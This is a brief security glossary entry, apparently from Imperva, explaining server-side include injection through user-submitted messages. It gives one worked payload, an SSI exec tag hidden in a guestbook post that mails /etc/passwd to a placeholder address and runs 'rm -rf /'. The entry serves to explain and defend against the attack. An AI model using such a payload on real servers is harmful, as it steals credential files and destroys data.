Include files are part of the HTML code that describes a page. If combined with user supplied dynamic data, include files can be malicious. An attacker can inject dangerous server-side include tags, which will later on be parsed by the server-side includes parser. For example, consider the following input for a bulletin board message:
Hi Kevin, I love the guestbook!
<!--#exec cmd="mail -s 'Ha Ha' email@example.com </etc/passwd; rm -rf /"-->
If the user's message is written to an HTML file that is subsequently parsed for server-side includes, the command will be executed each time the page is loaded and an email containing the "passwd" file will be sent to the attacker, and the computer will be erased. | <urn:uuid:c73a2187-3ffd-4dde-8728-8bdd76ada7d2> | CC-MAIN-2017-04 | https://www.imperva.com/Resources/Glossary?term=stealth_commanding | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00062-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.902039 | 406 | 2.5625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.